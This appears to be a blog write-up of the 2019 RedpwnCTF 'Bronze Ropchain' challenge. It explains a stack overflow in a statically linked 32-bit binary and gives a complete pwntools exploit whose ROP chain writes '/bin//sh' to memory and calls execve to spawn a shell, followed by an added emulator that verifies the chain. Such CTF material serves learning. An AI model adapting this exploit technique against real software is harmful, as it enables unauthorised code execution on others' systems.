2019 RedpwnCTF Bronze Ropchain

Author: 111p1kk | Source: published 2019-08-18 16:27, 0 reads

This challenge deserves a quick writeup (thanks to Master Meng for today's pointers, hehe orz),
because it is a little different.


checksec

kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ checksec ./bronze_ropchain 
[*] '/home/kk/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain/bronze_ropchain'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

file/ldd

kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ file ./bronze_ropchain 
./bronze_ropchain: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=16a9964f0e243870ebccdaf50522bcee80741083, not stripped
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ldd ./bronze_ropchain 
    not a dynamic executable

Both commands show that the binary is statically linked.
ida
The vulnerability is easy to find: a stack overflow.

Aside: when I first saw that the canary was enabled, I wanted to leak the canary first, but... it is not needed. Because the binary is statically linked, checksec reports "Canary found" from the __stack_chk_fail symbol pulled in with libc; looking at the function in IDA there is no __readgsdword (the canary read) at all (Master Meng taught me this, hahahaha), so there is no canary in it.
Let's run it and see.

kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ./bronze_ropchain 
What is your name?
kkkkk
Hello kkkkk
! How are you on this fine day?

The read takes fewer than 0x400 bytes, and you can see that the function stops reading at \x0a (newline).
So we use ROPgadget to find a ropchain:

ROPgadget --binary ./bronze_ropchain --badbytes '00|0a' --ropchain

The --badbytes option asks for a ropchain that contains no \x00 or \x0a bytes.


exp 👇

#!/usr/bin/env python
from pwn import *
from struct import pack
# io = remote('chall2.2019.redpwn.net', 4004)
io = process('./bronze_ropchain')

io.recv()
# ROPgadget chain: write "/bin//sh\0" into .data, then execve(.data, &NULL, &NULL).
# Every word is free of \x00 and \x0a so it survives the newline-terminated read.
p = b''
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += b'/bin'
p += pack('<I', 0x080da060) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da064) # @ .data + 4
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += b'//sh'
p += pack('<I', 0x080da064) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret  (NUL terminator)
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080da060) # @ .data  (ebx = path)
p += pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080da068) # @ .data + 8  (ecx = argv -> NULL)
p += pack('<I', 0x080da060) # padding without overwrite ebx
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8  (edx = envp -> NULL)
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret  (x11 -> eax = 11 = execve, with no NUL byte)
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x080495b3) # int 0x80
payload = b"a" * 0x18 + b"a" * 4 + p   # 0x18 buffer + saved ebp, then the chain

io.sendline(payload)
io.sendline(b'')

io.interactive()
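To see why this chain works and why --badbytes matters, here is an added example (not from the original post) that rebuilds the chain from the gadget addresses above, checks it for \x00 and \x0a bytes, and walks it through a tiny gadget emulator to confirm the register and memory state at int 0x80. The gadget semantics come from the chain's comments; DATA and w are this example's own names.

```python
import struct

BAD = {0x00, 0x0a}   # bytes the newline-terminated read would strip or stop at
DATA = 0x080da060    # .data address used by the page's chain
def w(v): return struct.pack("<I", v)   # one little-endian chain word

GADGETS = {  # semantics keyed by the addresses in the page's chain; every gadget ends in ret
    0x0806ef2b: ["pop edx"], 0x080481c9: ["pop ebx"], 0x0806ef52: ["pop ecx", "pop ebx"],
    0x080564b4: ["pop eax", "pop edx", "pop ebx"], 0x08056fe5: ["mov [edx], eax"],
    0x080565a0: ["xor eax, eax"], 0x0807c3ba: ["inc eax"], 0x080495b3: ["int 0x80"],
}

def build_chain():
    """Rebuild the page's chain: store '/bin//sh\\0' in .data, then execve."""
    p = b""
    for off, s in ((0, b"/bin"), (4, b"//sh")):
        p += w(0x0806ef2b) + w(DATA + off)                      # edx = &.data[off]
        p += w(0x080564b4) + s + w(DATA + off) + w(0x41414141)  # eax = s; edx kept; ebx junk
        p += w(0x08056fe5)                                      # [edx] = eax
    p += w(0x0806ef2b) + w(DATA + 8) + w(0x080565a0) + w(0x08056fe5)  # [.data+8] = 0
    p += w(0x080481c9) + w(DATA)                                # ebx = path
    p += w(0x0806ef52) + w(DATA + 8) + w(DATA)                  # ecx = argv -> NULL; ebx kept
    p += w(0x0806ef2b) + w(DATA + 8)                            # edx = envp -> NULL
    p += w(0x080565a0) + w(0x0807c3ba) * 11                     # eax = 11 (execve), no NUL byte
    return p + w(0x080495b3)                                    # int 0x80

def bad_bytes(chain):
    return [i for i, b in enumerate(chain) if b in BAD]   # offsets that would not survive the read

def emulate(chain):
    """Walk the chain as a ret-sled; return (regs, mem) when int 0x80 is reached."""
    words = [struct.unpack("<I", chain[i:i + 4])[0] for i in range(0, len(chain), 4)]
    regs, mem, pc = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}, {}, 0
    while pc < len(words):
        addr, pc = words[pc], pc + 1
        for insn in GADGETS[addr]:
            if insn.startswith("pop "):
                regs[insn[4:]], pc = words[pc], pc + 1
            elif insn == "mov [edx], eax":
                mem[regs["edx"]] = w(regs["eax"])
            elif insn == "xor eax, eax":
                regs["eax"] = 0
            elif insn == "inc eax":
                regs["eax"] = (regs["eax"] + 1) & 0xffffffff
            else:  # int 0x80: the kernel sees eax/ebx/ecx/edx as set
                return regs, mem
    raise ValueError("chain ended before the syscall")
```

Running emulate(build_chain()) shows eax = 11 with ebx pointing at "/bin//sh" and ecx/edx at the NUL word, which is exactly the execve call the chain was generated for.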

Article link: https://www.haomeiwen.com/subject/ytwrsctx.html